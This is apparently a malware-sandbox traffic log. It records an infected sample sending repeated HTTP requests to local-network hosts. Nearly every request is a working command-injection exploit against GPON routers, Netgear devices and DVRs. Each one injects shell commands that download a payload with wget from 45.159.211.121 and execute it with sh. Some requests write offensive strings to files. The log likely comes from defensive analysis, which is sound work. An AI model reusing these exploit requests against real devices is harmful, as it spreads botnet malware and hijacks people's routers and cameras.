Source: global traffic HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 192.168.0.17Content-Length: 216Connection: closeData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 60 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh`;wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh&ipv=0
Source: global traffic HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 192.168.0.13Content-Length: 216Connection: closeData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 60 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh`;wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh&ipv=0
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.17Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.13Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.17Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.13Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.17Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.13Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.17Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.13Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.17Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.13Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.17Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.13Connection: close
Source: global traffic HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 192.168.0.13Content-Length: 216Connection: closeData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 60 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh`;wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh&ipv=0
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.228.222.241Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.228.222.241Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.13Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.13Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.13Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.13Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.13Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.13Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.228.222.241Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.228.222.241Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.228.222.241Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.174Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.174Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.174Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.174Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.174Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.174Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.174Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.174Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.174Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.174Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.174Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.174Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.174Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.174Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.174Connection: close
Source: global traffic HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 192.168.0.33Content-Length: 216Connection: closeData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 60 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh`;wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh&ipv=0
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.33Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.33Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.33Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.33Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.33Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.33Connection: close
Source: global traffic HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 192.168.0.34Content-Length: 216Connection: closeData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 60 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh`;wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh&ipv=0
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.34Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.34Connection: close
Source: global traffic HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 192.168.0.41Content-Length: 216Connection: closeData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 60 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh`;wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh&ipv=0
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.41Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.34Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.41Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.34Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.41Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.34Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.41Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.34Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.41Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.41Connection: close
Source: global traffic HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 192.168.0.44Content-Length: 216Connection: closeData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 60 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh`;wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh&ipv=0
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.44Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.44Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.44Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.44Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.44Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.44Connection: close
Source: global traffic HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 192.168.0.52Content-Length: 216Connection: closeData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 60 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh`;wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh&ipv=0
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.52Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.52Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.52Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.52Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.52Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.52Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 188.114.96.3Connection: close
Source: global traffic HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 192.168.0.47Content-Length: 216Connection: closeData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 60 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh`;wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh&ipv=0
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.47Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.47Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.47Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.47Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.47Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.47Connection: close
